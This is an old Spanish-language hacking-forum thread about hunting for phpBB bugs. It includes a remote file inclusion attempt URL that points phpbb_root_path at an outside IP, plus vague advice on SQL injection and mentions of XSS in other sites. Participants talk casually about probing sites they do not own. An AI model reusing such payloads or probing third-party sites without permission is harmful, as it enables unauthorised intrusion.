elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Buscar Ingresar Registrarse
25 Mayo 2012, 15:46  


Tema destacado: Recuerda que debes registrarte en el foro para poder participar (preguntar y responder)

+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits (Moderador: berz3k)
| | |-+  Provando en phpbb		 0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Provando en phpbb  (Leído 1,290 veces)
Rey11


Desconectado Desconectado

Mensajes: 3.244



Ver Perfil WWW
Provando en phpbb
« en: 2 Noviembre 2005, 19:09 »
Estoy buscando algún tipo de Vulnerabilidad en phpbb. Por ahora lo que he conseguido poniendo esto:
http://www.algo.net/Foro/common.php?phpbb_root_path=http://70.85.163.146/~reydelmu/&phpEx=php
Es que me salga Hacking attempt.
Mi pregunta es, ¿voy por buen camino o esto es solo un sistema de seguridad que tienen los foros phpbb si se trata de encontrar bug?
Saludos   8)
En línea
sikik


Desconectado Desconectado

Mensajes: 664


Jo sóc jo i la meva circumstància.


Ver Perfil
Re: Provando en phpbb
« Respuesta #1 en: 2 Noviembre 2005, 19:30 »
vas por buen camino, cuando te diga :
Código:
you are a d3f4x0r
entonces ya habrás encontrado un bug


na broma eso es que está protegido:P
no creo que puedas hacer muchos rfis en los phpbbs, eso ya esta muy mirado,
saludos.
En línea
"Social Engineer -> Because there is no patch for human stupidity".
"Però qui s'ha inclinat sobre l'abisme, qui ha vist, patirà per sempre la temptació de tornar un altre cop a aquest punt negre en el qual les tenebres il·luminen(...)"
Warning: shell_exec() has been disabled for security reasons at line 274.
mousehack


Desconectado Desconectado

Mensajes: 1.142

Ex-Colaborador....!!!!!!XD


Ver Perfil
Re: Provando en phpbb
« Respuesta #2 en: 2 Noviembre 2005, 19:41 »
yo probaria mas por SQL injection que por RFI...pero bue... ;)

Salu2
En línea


VISITEN MI BLOG PERSONAL....
http://mousehack.blogspot.com/ ...XD
Rey11


Desconectado Desconectado

Mensajes: 3.244



Ver Perfil WWW
Re: Provando en phpbb
« Respuesta #3 en: 2 Noviembre 2005, 19:56 »
mousehack tienes razón pero es que no entiendo muy bien lo de sql inyection, si algién me dejara algún que otro manual.
Saludos  8)
P.D esto también me sirve para verficar si el sistema que ando contruyendo es vulnerable a esos ataques. Estoy leyendo la sección de seguridad del manual oficial del php no se si por ahí vendra esto lo del sql inyection.
En línea
mousehack


Desconectado Desconectado

Mensajes: 1.142

Ex-Colaborador....!!!!!!XD


Ver Perfil
Re: Provando en phpbb
« Respuesta #4 en: 2 Noviembre 2005, 19:59 »
SQL injection, tiene muchas variantes...voy a ver si termino el manual que comence a escribir hace tiempo, y si el administrador me deja lo posteo por aqui... :)

Salu2
En línea


VISITEN MI BLOG PERSONAL....
http://mousehack.blogspot.com/ ...XD
Rey11


Desconectado Desconectado

Mensajes: 3.244



Ver Perfil WWW
Re: Provando en phpbb
« Respuesta #5 en: 2 Noviembre 2005, 20:12 »
Gracias mousehack, pero sabes de alguno bueno, no solo para ver Vulnerabilidades phpbb si no para corregir fallos que podría tener en mi sistema php.
Saludos  8)
En línea
Dinio_Albino

Desconectado Desconectado

Mensajes: 25


Ver Perfil
Re: Provando en phpbb
« Respuesta #6 en: 3 Noviembre 2005, 12:42 »
qué es Rfi???


Por cierto, cómo se utiliza el sql injection en phpbb por ejemplo, me explico:

yo ahora estoy estudiando programación y estoy dando sql, consultas etc...pero cómo utilizo eso en phpbb si se diera el caso?

gracias.
En línea


whaky

Desconectado Desconectado

Mensajes: 151


Angel del Infierno


Ver Perfil
Re: Provando en phpbb
« Respuesta #7 en: 3 Noviembre 2005, 15:27 »
Cita de: Dinio_Albino en  3 Noviembre 2005, 12:42
qué es Rfi??

Por cierto, cómo se utiliza el sql injection en phpbb por ejemplo, me explico:

yo ahora estoy estudiando programación y estoy dando sql, consultas etc...pero cómo utilizo eso en phpbb si se diera el caso?

gracias.

Sobre rfi esta hablado en el foro no vengas preguntando cosas tan simples.
lo de las konsultas kuando un foro es vulnerable sera algo asi.

www.direccionforo.com/algomasporaki......=[sql]
donde veas sql tienes q poner la konsulta sql.
En línea
Los muertos hablan y las paredes oyen
por si acaso nunca reveles tu identidad.
oRTNZ


Desconectado Desconectado

Mensajes: 808


no no soy malo... soy vicioso :p


Ver Perfil
Re: Provando en phpbb
« Respuesta #8 en: 3 Noviembre 2005, 18:23 »
no se si sirva mi comentario, pues yo encuentro cada portal php, XSS, pero no son foros, estuve probando en varios portales y haber si me cuelgo de esas webs, pero deje el proyecto  ;D,saludos amigos
En línea
(31 del 12 de 2005) un dia que recuerdo siempre! :p
(03 del 08 de 2006) otro dia que lo recordare siempre...
Si eres Peruano, QUEDATE y si quieres ser de segunda mano del pais que fueras, pues LARGATE Y NO REGRESES...
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  
Powered by SMF 1.1.16 | SMF © 2006-2008, Simple Machines